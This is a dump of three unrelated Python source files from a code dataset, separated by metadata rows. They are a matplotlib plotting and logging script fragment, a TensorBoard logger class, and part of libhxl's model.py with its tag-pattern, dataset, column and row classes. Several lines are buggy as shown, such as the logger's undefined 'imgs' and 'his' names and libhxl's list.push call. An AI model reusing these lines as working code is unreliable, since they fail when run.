ax_ia_CE.plot(CE_90_ia, "--*", color="blue", label= "CE_90");
ax_ia_CE.plot( delta_r, "--o", color="cyan", label= "GT");
ax_ia_CE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_ia_CE.set_ylabel('Error (meters)',fontsize= 20);
ax_ia_CE.legend(loc='best', frameon=False);
# ax_ia_CE.set_title('IA CE')
fname = trials_root + "/GEO_results/IA_CE_" + desc_name + ".pdf"
fig_ia_CE.savefig(fname, transparent=True, pad_inches=5)
fig_ia_LE = plt.figure()
ax_ia_LE = fig_ia_LE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_ia_LE.plot(LE_70_ia, "--s", color="green", label= "LE_70");
ax_ia_LE.plot(LE_80_ia, "--^", color="magenta", label= "LE_80");
ax_ia_LE.plot(LE_90_ia, "--*", color="blue", label= "LE_90");
ax_ia_LE.plot( delta_z, "--o", color="cyan", label= "GT");
ax_ia_LE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_ia_LE.set_ylabel('Error (meters)',fontsize= 20);
ax_ia_LE.legend(loc='best', frameon=False);
# ax_ia_LE.set_title('IA LE')
fname = trials_root + "/GEO_results/IA_LE_" + desc_name + ".pdf"
fig_ia_LE.savefig(fname, transparent=True, pad_inches=5)
fig_icp_CE = plt.figure()
ax_icp_CE = fig_icp_CE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_icp_CE.plot(CE_70_icp, "--s", color="green", label= "CE_70");
ax_icp_CE.plot(CE_80_icp, "--^", color="magenta", label= "CE_80");
ax_icp_CE.plot(CE_90_icp, "--*", color="blue", label= "CE_90");
ax_icp_CE.plot( delta_r, "--o", color="cyan", label= "GT");
ax_icp_CE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_icp_CE.set_ylabel('Error (meters)',fontsize= 20);
ax_icp_CE.legend(loc='best', frameon=False);
# ax_icp_CE.set_title('ICP CE')
fname = trials_root + "/GEO_results/ICP_CE_" + desc_name + ".pdf"
fig_icp_CE.savefig(fname, transparent=True, pad_inches=5)
fig_icp_LE = plt.figure()
ax_icp_LE = fig_icp_LE.add_subplot(111);
plt.hold(True);
plt.axis(tight=True);
ax_icp_LE.plot(LE_70_icp, "--s", color="green", label= "LE_70");
ax_icp_LE.plot(LE_80_icp, "--^", color="magenta", label= "LE_80");
ax_icp_LE.plot(LE_90_icp, "--*", color="blue", label= "LE_90");
ax_icp_LE.plot( delta_z, "--o", color="cyan", label= "GT");
ax_icp_LE.set_xlabel('Fiducial Marker (index)',fontsize= 20);
ax_icp_LE.set_ylabel('Error (meters)',fontsize= 20);
ax_icp_LE.legend(loc='best', frameon=False);
# ax_icp_LE.set_title('ICP LE')
fname = trials_root + "/GEO_results/ICP_LE_" + desc_name + ".pdf"
fig_icp_LE.savefig(fname, transparent=True, pad_inches=5)
# axT.set_xlim((0,505) );
# axT.set_yticks(np.arange(0.0,250.0,20));
# # axT.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,
# # ncol=4, mode="expand", borderaxespad=0.)
#
# figT.savefig("/Users/isa/Experiments/reg3d_eval/downtown_dan/T_error.pdf", transparent=True, pad_inches=5)
# plt.show();
# import pdb; pdb.set_trace()
def setlogging(logfile=None):
level = logging.DEBUG
logger = logging.getLogger(__name__)
logger.setLevel(level)
# create formatter and add it to the handlers
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(level)
ch.setFormatter(formatter)
# add the handlers to logger
logger.addHandler(ch)
# create file handler which logs error messages
if logfile:
print "Logging to file"
fh = logging.FileHandler(logfile)
fh.setLevel(level)
fh.setFormatter(formatter)
logger.addHandler(fh)
#test logging
logger.debug("debug message")
logger.info("info message")
logger.warn("warn message")
logger.error("error message")
logger.critical("critical message")
return logger
if __name__ == '__main__':
# initialize the parser object:
parser = argparse.ArgumentParser(description="Export PLY to PCD file")
# define options here:
parser.add_argument("-v", "--verbose", action='store', type = bool, dest="verbose", default=True, help="Write debug log to log_file")
parser.add_argument("-L", "--log", dest="logfile", help="write debug log to log_file")
args = parser.parse_args(argv)
# set up logging
if args.verbose:
status = main(args.logfile)
else:
status = main()
sys.exit(status)
|
bsd-2-clause
| 5,998,700,725,163,091,000
| 37.924581
| 150
| 0.568497
| false
| 3.043241
| false
| false
| false
|
denizs/torchUp
|
torchup/logging/logger.py
|
1
|
1865
|
import tensorflow as tf
import numpy as np
import scipy.misc
from tensorboardX.src.summary_pb2 import Summary
from tensorboardX import SummaryWriter
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO
class Logger(object):
def __init__(self, log_dir):
'''
Create a summary writer logging to log_dir
'''
self.writer = tf.summary.FileWriter(log_dir)
self.writerX = SummaryWriter(log_dir=log_dir)
def scalar_summary(self, tag, value, step):
'''
Log scalar value
'''
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])
self.writer.add_summary(summary, step)
def add_image(self, tag, img, step):
'''
Log img
'''
summary = Summary(value=[Summary.Value(tag=tag, image=imgs)])
self.writerX.add_summary(summary, step)
def histo_summary(self, tag, values, step, bins=1000):
'''
Log a histogram of the tensor of values.
'''
# Create histogram:
counts, bin_edges = np.histogram(values, bins=bins)
# Fill the fields of the histogram proto
hist = tf.HistogramProto()
his.min = float(np.min(values))
his.max = float(np.max(values))
hist.num = int(np.prod(values.shape))
hist.sum = float(np.sum(values))
hist.sum_squares = float(np.sum(values**2))
# Drop the start of the first bin
bin_edges = bin_edges[1:]
# Add bin edges and counts:
for edge in bin_edges:
hist.bucket_limit.append(edge)
for c in counts:
hist.bucket.append(c)
# Create and write Summary
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, histo=hist)])
self.writer.add_summary(summary, step)
self.writer.flush()
|
bsd-2-clause
| -5,471,846,208,124,120,000
| 28.140625
| 83
| 0.604826
| false
| 3.813906
| false
| false
| false
|
HXLStandard/libhxl-python
|
hxl/model.py
|
1
|
48776
|
"""Main data-model classes for the Humanitarian Exchange Language (HXL).
This module defines the basic classes for working with HXL data. Other
modules have classes derived from these (e.g. in
[hxl.filters](filters.html) or [hxl.io](io.html)). The core class is
[Dataset](#hxl.model.Dataset), which defines the operations available
on a HXL dataset, including convenience methods for chaining filters.
Typical usage:
source = hxl.data("https://example.org/data.csv")
# returns a hxl.model.Dataset object
result = source.with_lines("#country+name=Kenya").sort()
# a filtered/sorted view of the data
This code is released into the Public Domain and comes with NO WARRANTY.
"""
import abc, copy, csv, dateutil, hashlib, json, logging, operator, re, six
import hxl
logger = logging.getLogger(__name__)
class TagPattern(object):
"""Pattern for matching a HXL hashtag and attributes
- the pattern "#*" matches any hashtag/attribute combination
- the pattern "#*+foo" matches any hashtag with the foo attribute
- the pattern "#tag" matches #tag with any attributes
- the pattern "#tag+foo" matches #tag with foo among its attributes
- the pattern "#tag-foo" matches #tag with foo *not* among its attributes
- the pattern "#tag+foo-bar" matches #tag with foo but not bar
- the pattern "#tag+foo+bar!" matches #tag with exactly the attributes foo and bar, but *no others*
The normal way to create a tag pattern is using the
[parse()](#hxl.model.TagPattern.parse) method rather than the
constructor:
pattern = hxl.model.TagPattern.parse("#affected+f-children")
Args:
tag: the basic hashtag (without attributes)
include_attributes: a list of attributes that must be present
exclude_attributes: a list of attributes that must not be present
is_absolute: if True, no attributes are allowed except those in _include_attributes_
"""
PATTERN = r'^\s*#?({token}|\*)((?:\s*[+-]{token})*)\s*(!)?\s*$'.format(token=hxl.datatypes.TOKEN_PATTERN)
"""Constant: regular expression to match a HXL tag pattern.
"""
def __init__(self, tag, include_attributes=[], exclude_attributes=[], is_absolute=False):
self.tag = tag
self.include_attributes = set(include_attributes)
"""Set of all attributes that must be present"""
self.exclude_attributes = set(exclude_attributes)
"""Set of all attributes that must not be present"""
self.is_absolute = is_absolute
"""True if this pattern is absolute (no extra attributes allowed)"""
def is_wildcard(self):
return self.tag == '#*'
def match(self, column):
"""Check whether a Column matches this pattern.
@param column: the column to check
@returns: True if the column is a match
"""
if column.tag and (self.is_wildcard() or self.tag == column.tag):
# all include_attributes must be present
if self.include_attributes:
for attribute in self.include_attributes:
if attribute not in column.attributes:
return False
# all exclude_attributes must be absent
if self.exclude_attributes:
for attribute in self.exclude_attributes:
if attribute in column.attributes:
return False
# if absolute, then only specified attributes may be present
if self.is_absolute:
for attribute in column.attributes:
if attribute not in self.include_attributes:
return False
return True
else:
return False
def get_matching_columns(self, columns):
"""Return a list of columns that match the pattern.
@param columns: a list of L{hxl.model.Column} objects
@returns: a list (possibly empty)
"""
result = []
for column in columns:
if self.match(column):
result.append(column)
return result
def find_column_index(self, columns):
"""Get the index of the first matching column.
@param columns: a list of columns to check
@returns: the 0-based index of the first matching column, or None for no match
"""
for i in range(len(columns)):
if self.match(columns[i]):
return i
return None
def find_column(self, columns):
"""Check whether there is a match in a list of columns."""
for column in columns:
if self.match(column):
return column
return None
def __repr__(self):
s = self.tag
if self.include_attributes:
for attribute in self.include_attributes:
s += '+' + attribute
if self.exclude_attributes:
for attribute in self.exclude_attributes:
s += '-' + attribute
return s
__str__ = __repr__
@staticmethod
def parse(s):
"""Parse a single tag-pattern string.
pattern = TagPattern.parse("#affected+f-children")
The [parse_list()](#hxl.model.TagPattern.parse_list) method
will call this method to parse multiple patterns at once.
Args:
s: the tag-pattern string to parse
Returns:
A TagPattern object
"""
if not s:
# edge case: null value
raise hxl.HXLException('Attempt to parse empty tag pattern')
elif isinstance(s, TagPattern):
# edge case: already parsed
return s
result = re.match(TagPattern.PATTERN, s)
if result:
tag = '#' + result.group(1).lower()
include_attributes = set()
exclude_attributes = set()
attribute_specs = re.split(r'\s*([+-])', result.group(2))
for i in range(1, len(attribute_specs), 2):
if attribute_specs[i] == '+':
include_attributes.add(attribute_specs[i + 1].lower())
else:
exclude_attributes.add(attribute_specs[i + 1].lower())
if result.group(3) == '!':
is_absolute = True
if exclude_attributes:
raise ValueError('Exclusions not allowed in absolute patterns')
else:
is_absolute = False
return TagPattern(
tag,
include_attributes=include_attributes,
exclude_attributes=exclude_attributes,
is_absolute=is_absolute
)
else:
raise hxl.HXLException('Malformed tag: ' + s)
@staticmethod
def parse_list(specs):
"""Parse a list of tag-pattern strings.
If _specs_ is a list of already-parsed TagPattern objects, do
nothing. If it's a list of strings, apply
[parse()](#hxl.model.TagPattern.parse) to each one. If it's a
single string with multiple patterns separated by commas,
split the string, then parse the patterns.
patterns = TagPattern.parse_list("#affected+f,#inneed+f")
# or
patterns = TagPattern.parse_list("#affected+f", "#inneed+f")
Args:
specs: the raw input (a list of strings, or a single string with commas separating the patterns)
Returns:
A list of TagPattern objects.
"""
if not specs:
return []
if isinstance(specs, six.string_types):
specs = specs.split(',')
return [TagPattern.parse(spec) for spec in specs]
@staticmethod
def match_list(column, patterns):
"""Test if a column matches any of the patterns in a list.
This is convenient to use together with [parse_list()](hxl.model.TagPattern.parse_list):
patterns = TagPattern.parse_list(["#affected+f", "#inneed+f"])
if TagPattern.match_list(column, patterns):
print("The column matched one of the patterns")
Args:
column: the column to test
patterns: a list of zero or more patterns.
Returns:
True if there is a match
"""
for pattern in patterns:
if pattern.match(column):
return True
return False
class Dataset(object):
"""Abstract base class for a HXL data source.
Any source of parsed HXL data inherits from this class: that
includes Dataset, HXLReader, and the various filters in the
hxl.old_filters package. The contract of a Dataset is that it will
provide a columns property and a next() method to read through the
rows.
The child class must implement the columns() method as a property
and the __iter__() method to make itself iterable.
"""
__metaclass__ = abc.ABCMeta
def __init__(self):
"""Constructor."""
super().__init__()
@abc.abstractmethod
def __iter__(self):
"""Get the iterator over the rows.
@returns: an iterator that returns L{hxl.model.Row} objects
"""
raise RuntimeException("child class must implement __iter__() method")
@property
def is_cached(self):
"""Test whether the source data is cached (replayable).
By default, this is False, but some subclasses may override.
@returns: C{True} if the input is cached (replayable); C{False} otherwise.
"""
return False
@property
@abc.abstractmethod
def columns(self):
"""Get the column definitions for the dataset.
@returns: a list of Column objects.
"""
raise RuntimeException("child class must implement columns property method")
@property
def columns_hash(self):
"""Generate a hash across all of the columns in the dataset.
This function helps detect whether two HXL documents are of
the same type, even if they contain different data (e.g. the
HXL API output for the same humanitarian dataset in two
different months or two different countries).
It takes into account text headers, hashtags, the order of
attributes, and the order of columns. Whitespace is
normalised, and null values are treated as empty strings. The
MD5 hash digest is generated from a UTF-8 encoded version of
each header.
@returns: a 32-character hex-formatted MD5 hash string
"""
md5 = hashlib.md5()
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.header).encode('utf-8'))
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.display_tag).encode('utf-8'))
return md5.hexdigest()
@property
def data_hash(self):
"""Generate a hash for the entire dataset.
This function allows checking if two HXL datasets are
functionally identical. It takes into account text headers,
hashtags, the order of attributes, and the order of
columns. Whitespace is normalised, and null values are treated
as empty strings. The MD5 hash digest is generated from a
UTF-8 encoded version of each header and data cell.
@returns: a 32-character hex-formatted MD5 hash string
"""
md5 = hashlib.md5()
# text header row
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.header).encode('utf-8'))
# hashtag row
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.display_tag).encode('utf-8'))
# data rows
for row in self:
for value in row:
md5.update(hxl.datatypes.normalise_space(value).encode('utf-8'))
return md5.hexdigest()
@property
def headers(self):
"""Return a list of header strings (for a spreadsheet row).
"""
return [column.header if column else '' for column in self.columns]
@property
def tags(self):
"""Get all hashtags (without attributes) as a list
@returns: a list of base hashtags for the dataset columns
"""
return [column.tag if column else '' for column in self.columns]
@property
def display_tags(self):
"""Return a list of display tags.
@returns: a list of strings containing the hashtag and attributes for each column
"""
return [column.display_tag if column else '' for column in self.columns]
@property
def has_headers(self):
"""Report whether any non-empty header strings exist.
@returns: C{True} if there is at least one column with a non-empty header string
"""
for column in self.columns:
if column.header:
return True
return False
@property
def values(self):
"""Get all values for the dataset at once, in an array of arrays.
This method can be highly inefficient for large datasets.
@returns: an array of arrays of scalar values
"""
return [row.values for row in self]
def get_value_set(self, tag_pattern=None, normalise=False):
"""Return the set of all values in a dataset (optionally matching a tag pattern for a single column)
Warning: this method can be highly inefficient for large datasets.
@param tag_pattern: (optional) return values only for columns matching this tag pattern.
@param normalise: (optional) normalise the strings with hxl.datatypes.normalise (default: False)
@returns: a Python set of values
"""
value_set = set([])
if tag_pattern:
tag_pattern = TagPattern.parse(tag_pattern)
for row in self:
if tag_pattern:
new_values = row.get_all(tag_pattern)
else:
new_values = row.values
if normalise:
new_values = [hxl.datatypes.normalise(s) for s in new_values]
else:
new_values = [hxl.datatypes.normalise_space(s) for s in new_values]
value_set.update(new_values)
return value_set
def get_column_indices(self, tag_patterns, columns):
"""Get a list of indices that match the tag patterns provided
@param tag_patterns: a list of tag patterns or a string version of the list
@param columns: a list of columns
@returns: a (possibly-empty) list of 0-based indices
"""
patterns = TagPattern.parse_list(tag_patterns)
indices = []
for i, column in enumerate(columns):
for pattern in patterns:
if pattern.match(column):
indices.push(i)
return indices
#
# Aggregates
#
def _get_minmax(self, pattern, op):
"""Calculate the extreme min/max value for a tag pattern
Will iterate through the dataset, and use values from multiple matching columns.
Uses numbers, dates, or strings for comparison, based on the first non-empty value found.
@param pattern: the L{hxl.model.TagPattern} to match
@param op: operator_lt or operator_gt
@returns: the extreme value according to operator supplied, or None if no values found
"""
pattern = TagPattern.parse(pattern)
result_raw = None # what's actually in the dataset
result_normalised = None # normalised version for comparison
# Look at every row
for row in self:
# Look at every matching value in every row
for i, value in enumerate(row.get_all(pattern)):
# ignore empty values
if hxl.datatypes.is_empty(value):
continue
# make a normalised value for comparison
normalised = hxl.datatypes.normalise(value, row.columns[i])
# first non-empty value is always a match
if result_normalised is None:
result_raw = value
result_normalised = normalised
else:
# try comparing the normalised types first, then strings on failure
try:
if op(normalised, result_normalised):
result_raw = value
result_normalised = normalised
except TypeError:
if op(str(normalised), str(result_normalised)):
result_raw = value
result_normalised = normalised
return result_raw
def min(self, pattern):
"""Calculate the minimum value for a tag pattern
Will iterate through the dataset, and use values from multiple matching columns.
Uses numbers, dates, or strings for comparison, based on the first non-empty value found.
@param pattern: the L{hxl.model.TagPattern} to match
@returns: the minimum value according to the '<' operator, or None if no values found
"""
return self._get_minmax(pattern, operator.lt)
def max(self, pattern):
"""Calculate the maximum value for a tag pattern
Will iterate through the dataset, and use values from multiple matching columns.
@param pattern: the L{hxl.model.TagPattern} to match
@returns: the minimum value according to the '<' operator, or None if no values found
"""
return self._get_minmax(pattern, operator.gt)
#
# Utility
#
def validate(self, schema=None, callback=None):
"""
Validate the current dataset.
@param schema (optional) the pre-compiled schema, schema filename, URL, file object, etc. Defaults to a built-in schema.
@param callback (optional) a function to call with each error or warning. Defaults to collecting errors in an array and returning them.
"""
return hxl.schema(schema, callback).validate(self)
def recipe(self, recipe):
"""Parse a recipe (JSON or a list of dicts) and create the appropriate filters.
@param recipe: a list of dicts, a single dict, or a JSON literal string.
@return: the new end filter.
"""
import hxl.filters
return hxl.filters.from_recipe(self, recipe)
#
# Filters
#
def append(self, append_sources, add_columns=True, queries=[]):
"""Append additional datasets.
@param append_sources: a list of sources to append
@param add_columns: if True (default), include any extra columns in the append sources
@param queries: a list of row queries to select rows for inclusion from the append sources.
@returns: a new HXL source for chaining
"""
import hxl.filters
return hxl.filters.AppendFilter(self, append_sources, add_columns=add_columns, queries=queries)
def append_external_list(self, source_list_url, add_columns=True, queries=[]):
"""Append additional datasets from an external list
@param source_list_url: URL of a HXL dataset containing a list of sources to append.
@param add_columns: if True (default), include any extra columns in the append sources.
@param queries: a list of row queries to select rows for inclusion from the append sources.
@returns: a new HXL source for chaining
"""
import hxl.filters
logger.debug("Loading append list from %s...", source_list_url)
append_sources = hxl.filters.AppendFilter.parse_external_source_list(source_list_url)
logger.debug("Done loading")
return hxl.filters.AppendFilter(self, append_sources, add_columns=add_columns, queries=queries)
def cache(self):
"""Add a caching filter to the dataset."""
import hxl.filters
return hxl.filters.CacheFilter(self)
def dedup(self, patterns=[], queries=[]):
"""Deduplicate a dataset."""
import hxl.filters
return hxl.filters.DeduplicationFilter(self, patterns=patterns, queries=queries)
def with_columns(self, includes):
"""Select matching columns."""
import hxl.filters
return hxl.filters.ColumnFilter(self, include_tags=includes)
def without_columns(self, excludes=None, skip_untagged=False):
"""Select non-matching columns."""
import hxl.filters
return hxl.filters.ColumnFilter(self, exclude_tags=excludes, skip_untagged=skip_untagged)
def with_rows(self, queries, mask=[]):
"""Select matching rows.
@param queries: a predicate or list of predicates for rows to include
@param mask: a predicate or list of predicates for rows to test (default: [] to test all)
@return: a filtered version of the source
"""
import hxl.filters
return hxl.filters.RowFilter(self, queries=queries, reverse=False, mask=mask)
def without_rows(self, queries, mask=[]):
"""Select non-matching rows.
@param queries: a predicate or list of predicates for rows to ignore
@param mask: a predicate or list of predicates for rows to test (default: [] to test all)
@return: a filtered version of the source
"""
import hxl.filters
return hxl.filters.RowFilter(self, queries=queries, reverse=True, mask=mask)
def sort(self, keys=None, reverse=False):
"""Sort the dataset (caching)."""
import hxl.filters
return hxl.filters.SortFilter(self, tags=keys, reverse=reverse)
def count(self, patterns=[], aggregators=None, queries=[]):
"""Count values in the dataset (caching)."""
import hxl.filters
return hxl.filters.CountFilter(
self, patterns=patterns, aggregators=aggregators, queries=queries
)
def row_counter(self, queries=[]):
"""Count the number of rows while streaming."""
import hxl.filters
return hxl.filters.RowCountFilter(self, queries=queries)
def replace_data(self, original, replacement, pattern=None, use_regex=False, queries=[]):
"""Replace values in a HXL dataset."""
import hxl.filters
replacement = hxl.filters.ReplaceDataFilter.Replacement(original, replacement, pattern, use_regex)
return hxl.filters.ReplaceDataFilter(self, [replacement], queries=queries)
def replace_data_map(self, map_source, queries=[]):
"""Replace values in a HXL dataset."""
import hxl.filters
replacements = hxl.filters.ReplaceDataFilter.Replacement.parse_map(hxl.data(map_source))
return hxl.filters.ReplaceDataFilter(self, replacements, queries=queries)
def add_columns(self, specs, before=False):
"""Add fixed-value columns to a HXL dataset."""
import hxl.filters
return hxl.filters.AddColumnsFilter(self, specs=specs, before=before)
def rename_columns(self, specs):
"""Changes headers and tags on a column."""
import hxl.filters
return hxl.filters.RenameFilter(self, specs)
def clean_data(
self, whitespace=[], upper=[], lower=[], date=[], date_format=None,
number=[], number_format=None, latlon=[], purge=False, queries=[]
):
"""Clean data fields."""
import hxl.filters
return hxl.filters.CleanDataFilter(
self,
whitespace=whitespace,
upper=upper,
lower=lower,
date=date, date_format=date_format,
number=number, number_format=number_format,
latlon=latlon,
purge=purge,
queries=queries
)
def merge_data(self, merge_source, keys, tags, replace=False, overwrite=False, queries=[]):
"""Merges values from a second dataset.
@param merge_source: the second HXL data source
@param keys: a single tagspec or list of tagspecs for the shared keys
@param tags: the tags to copy over from the second dataset
@param replace: if True, replace existing columns when present
@param overwrite: if True, overwrite individual values in existing columns when available
@param queries: optional row queries to control the merge
"""
import hxl.filters
return hxl.filters.MergeDataFilter(self, merge_source, keys, tags, replace, overwrite, queries=queries)
def expand_lists(self, patterns=None, separator="|", correlate=False, queries=[]):
"""Expand lists by repeating rows.
By default, applies to every column with a +list attribute, and uses "|" as the separator.
@param patterns: a single tag pattern or list of tag patterns for columns to expand
@param separator: the list-item separator
"""
import hxl.filters
return hxl.filters.ExpandListsFilter(self, patterns=patterns, separator=separator, correlate=correlate, queries=queries)
def explode(self, header_attribute='header', value_attribute='value'):
"""Explodes a wide dataset into a long datasets.
@param header_attribute: the attribute to add to the hashtag of the column with the former header (default 'header')
@param value_attribute: the attribute to add to the hashtag of the column with the former value (default 'value')
@return: filtered dataset.
@see hxl.filters.ExplodeFilter
"""
import hxl.filters
return hxl.filters.ExplodeFilter(self, header_attribute, value_attribute)
def implode(self, label_pattern, value_pattern):
"""Implodes a long dataset into a wide dataset
@param label_pattern: the tag pattern to match the label column
@param value_pattern: the tag pattern to match the
@return: filtered dataset.
@see hxl.filters.ImplodeFilter
"""
import hxl.filters
return hxl.filters.ImplodeFilter(self, label_pattern=label_pattern, value_pattern=value_pattern)
def jsonpath(self, path, patterns=[], queries=[], use_json=True):
"""Parse the value as a JSON expression and extract data from it.
See http://goessner.net/articles/JsonPath/
@param path: a JSONPath expression for extracting data
@param patterns: a tag pattern or list of patterns for the columns to use (default to all)
@param queries: a predicate or list of predicates for the rows to consider.
@param use_json: if True, serialise multiple results as JSON lists.
@returns: filtered dataset
@see: hxl.filters.JSONPathFilter
"""
import hxl.filters
return hxl.filters.JSONPathFilter(self, path, patterns=patterns, queries=queries, use_json=use_json)
def fill_data(self, patterns=[], queries=[]):
"""Fills empty cells in a column using the last non-empty value.
@param patterns: a tag pattern or list of patterns for the columns to fill (default to all)
@param queries: a predicate or list of predicates for rows to fill (leave any blank that don't match).
@return filtered dataset
@see hxl.filters.FillFilter
"""
import hxl.filters
return hxl.filters.FillDataFilter(self, patterns=patterns, queries=queries)
#
# Generators
#
def gen_raw(self, show_headers=True, show_tags=True):
"""Generate an array representation of a HXL dataset, one at a time."""
if show_headers:
yield self.headers
if show_tags:
yield self.display_tags
for row in self:
yield row.values
def gen_csv(self, show_headers=True, show_tags=True):
"""Generate a CSV representation of a HXL dataset, one row at a time."""
class TextOut:
"""Simple string output source to capture CSV"""
def __init__(self):
self.data = ''
def write(self, s):
self.data += s
def get(self):
data = self.data
self.data = ''
return data
output = TextOut()
writer = csv.writer(output)
for raw in self.gen_raw(show_headers, show_tags):
writer.writerow(raw)
yield output.get()
def gen_json(self, show_headers=True, show_tags=True, use_objects=False):
"""Generate a JSON representation of a HXL dataset, one row at a time."""
is_first = True
yield "[\n"
if use_objects:
for row in self:
if is_first:
is_first = False
yield json.dumps(row.dictionary, sort_keys=True, indent=2)
else:
yield ",\n" + json.dumps(row.dictionary, sort_keys=True, indent=2)
else:
for raw in self.gen_raw(show_headers, show_tags):
if is_first:
is_first = False
yield json.dumps(raw)
else:
yield ",\n" + json.dumps(raw)
yield "\n]\n"
class Column(object):
"""
The definition of a logical column in the HXL data.
"""
# Regular expression to match a HXL tag
PATTERN = r'^\s*(#{token})((?:\s*\+{token})*)\s*$'.format(token=hxl.datatypes.TOKEN_PATTERN)
# To tighten debugging (may reconsider later -- not really a question of memory efficiency here)
__slots__ = ['tag', 'attributes', 'attribute_list', 'header', 'column_number']
def __init__(self, tag=None, attributes=(), header=None, column_number=None):
"""
Initialise a column definition.
@param tag: the HXL hashtag for the column (default: None)
@param attributes: (optional) a sequence of attributes (default: ())
@param header: (optional) the original plaintext header for the column (default: None)
@param column_number: (optional) the zero-based column number
"""
if tag:
tag = tag.lower()
self.tag = tag
self.header = header
self.column_number = column_number
self.attributes = set([a.lower() for a in attributes])
self.attribute_list = [a.lower() for a in attributes] # to preserve order
@property
def display_tag(self):
"""Default display version of a HXL hashtag.
Attributes are not sorted.
"""
return self.get_display_tag(sort_attributes=False)
def get_display_tag(self, sort_attributes=False):
"""
Generate a display version of the column hashtag
@param sort_attributes: if True, sort attributes; otherwise, preserve the original order
@return the reassembled HXL hashtag string, including language code
"""
if self.tag:
s = self.tag
for attribute in sorted(self.attribute_list) if sort_attributes else self.attribute_list:
s += '+' + attribute
return s
else:
return ''
def has_attribute(self, attribute):
"""Check if an attribute is present."""
return (attribute in self.attribute_list)
def add_attribute(self, attribute):
"""Add an attribute to the column."""
if attribute not in self.attributes:
self.attributes.add(attribute)
self.attribute_list.append(attribute)
return self
def remove_attribute(self, attribute):
"""Remove an attribute from the column."""
if attribute in self.attributes:
self.attributes.remove(attribute)
self.attribute_list.remove(attribute)
return self
def __hash__(self):
"""Make columns usable in a dictionary.
Only the hashtag and attributes are used.
"""
hash_value = hash(self.tag)
for attribute in self.attributes:
hash_value += hash(attribute)
return hash_value
def __eq__(self, other):
"""Test for comparison with another object.
For equality, only the hashtag and attributes have to be the same."""
try:
return (self.tag == other.tag and self.attributes == other.attributes)
except:
return False
def __repr__(self):
return self.display_tag
__str__ = __repr__
@staticmethod
def parse(raw_string, header=None, use_exception=False, column_number=None):
""" Attempt to parse a full hashtag specification.
@param raw_string: the string representation of the tagspec
@param header: the text header to include
@param use_exception: if True, throw an exception for a malformed tagspec
@returns: None if the string is empty, False if it's malformed (and use_exception is False), or a Column object otherwise
"""
# Already parsed?
if isinstance(raw_string, Column):
return raw_string
# Empty string?
if hxl.datatypes.is_empty(raw_string):
return None
# Pattern for a single tag
result = re.match(Column.PATTERN, raw_string)
if result:
tag = result.group(1)
attribute_string = result.group(2)
if attribute_string:
attributes = re.split(r'\s*\+', attribute_string.strip().strip('+'))
else:
attributes = []
return Column(tag=tag, attributes=attributes, header=header, column_number=column_number)
else:
if use_exception:
raise hxl.HXLException("Malformed tag expression: " + raw_string)
else:
logger.debug("Not a HXL hashtag spec: %s", raw_string)
return False
@staticmethod
def parse_spec(raw_string, default_header=None, use_exception=False, column_number=None):
"""Attempt to parse a single-string header/hashtag spec"""
# Already parsed?
if isinstance(raw_string, Column):
return raw_string
matches = re.match(r'^(.*)(#.*)$', raw_string)
if matches:
header = matches.group(1) if matches.group(1) else default_header
return Column.parse(matches.group(2), header=header, column_number=column_number)
else:
return Column.parse('#' + raw_string, header=default_header, column_number=column_number)
class Row(object):
"""
An iterable row of values in a HXL dataset.
"""
# Predefine the slots for efficiency (may reconsider later)
__slots__ = ['columns', 'values', 'row_number', 'source_row_number']
def __init__(self, columns, values=[], row_number=None, source_row_number=None):
"""
Set up a new row.
@param columns: The column definitions (array of Column objects).
@param values: (optional) The string values for the row (default: [])
@param row_number: (optional) The zero-based logical row number in the input dataset, if available (default: None)
@param source_row_number: (optional) The zero-based source row number in the input dataset, if available (default: None)
"""
self.columns = columns
self.values = copy.copy(values)
self.row_number = row_number
self.source_row_number = source_row_number
def append(self, value):
"""
Append a value to the row.
@param value The new value to append.
@return The new value
"""
self.values.append(value)
return value
def get(self, tag, index=None, default=None, parsed=False):
"""
Get a single value for a tag in a row.
If no index is provided ("None"), return the first non-empty value.
@param tag: A TagPattern or a string value for a tag.
@param index: The zero-based index if there are multiple values for the tag (default: None)
@param default: The default value if not found (default: None). Never parsed, even if parsed=True
@param parsed: If true, use attributes as hints to try to parse the value (e.g. number, list, date)
@return The value found, or the default value provided. If parsed=True, the return value will be a list (default: False)
"""
# FIXME - move externally, use for get_all as well, and support numbers and dates
def parse(column, value):
if parsed:
if column.has_attribute('list'):
return re.split(r'\s*,\s*', value)
else:
return [value]
return value
if type(tag) is TagPattern:
pattern = tag
else:
pattern = TagPattern.parse(tag)
for i, column in enumerate(self.columns):
if i >= len(self.values):
break
if pattern.match(column):
if index is None:
# None (the default) is a special case: it means look
# for the first truthy value
if self.values[i]:
return parse(column, self.values[i])
else:
# Otherwise, look for a specific index
if index == 0:
return parse(column, self.values[i])
else:
index = index - 1
return default
def get_all(self, tag, default=None):
"""
Get all values for a specific tag in a row
@param tag A TagPattern or a string value for a tag.
@return An array of values for the HXL hashtag.
"""
if type(tag) is TagPattern:
pattern = tag
else:
pattern = TagPattern.parse(tag)
result = []
for i, column in enumerate(self.columns):
if i >= len(self.values):
break
if pattern.match(column):
value = self.values[i]
if default is not None and not value:
value = default
result.append(value)
return result
def key(self, patterns=None, indices=None):
"""Generate a unique key tuple for the row, based on a list of tag patterns
@param patterns: a list of L{TagPattern} objects, or a parseable string
@returns: the key as a tuple (might be empty)
"""
key = []
# if the user doesn't provide indices, get indices from the pattern
if not indices and patterns:
indices = get_column_indices(patterns, self.columns)
if indices:
# if we have indices, use them to build the key
for i in indices:
if i < len(self.values):
key.append(hxl.datatypes.normalise(self.values[i], self.columns[i]))
else:
# if there are still no indices, use the whole row for the key
for i, value in enumerate(self.values):
key.append(hxl.datatypes.normalise(value, self.columns[i]))
